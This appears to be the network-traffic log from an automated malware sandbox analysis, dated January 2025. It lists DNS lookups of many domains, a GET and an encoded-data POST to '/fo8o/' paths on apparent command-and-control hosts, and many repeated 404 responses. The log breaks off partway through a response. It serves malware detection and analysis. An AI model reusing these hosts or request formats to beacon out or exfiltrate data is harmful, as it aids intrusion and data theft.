Source: global traffic	HTTP traffic detected: GET /fo8o/?bp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&XHI=wJbPZ8pHe HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 62 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 66 2b 69 68 4b 4e 35 6b 56 6a 42 53 54 58 45 45 48 35 7a 4f 77 6e 61 50 46 49 62 45 35 61 50 52 57 73 55 6b 58 34 3d Data Ascii: bp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOf+ihKN5kVjBSTXEEH5zOwnaPFIbE5aPRWsUkX4=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 06 Jan 2025 13:32:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 06 Jan 2025 13:33:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 06 Jan 2025 13:33:12 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 06 Jan 2025 13:33:15 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 06 Jan 2025 13:33:17 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:07 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:09 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:12 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:15 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:20 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 13:35:23 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 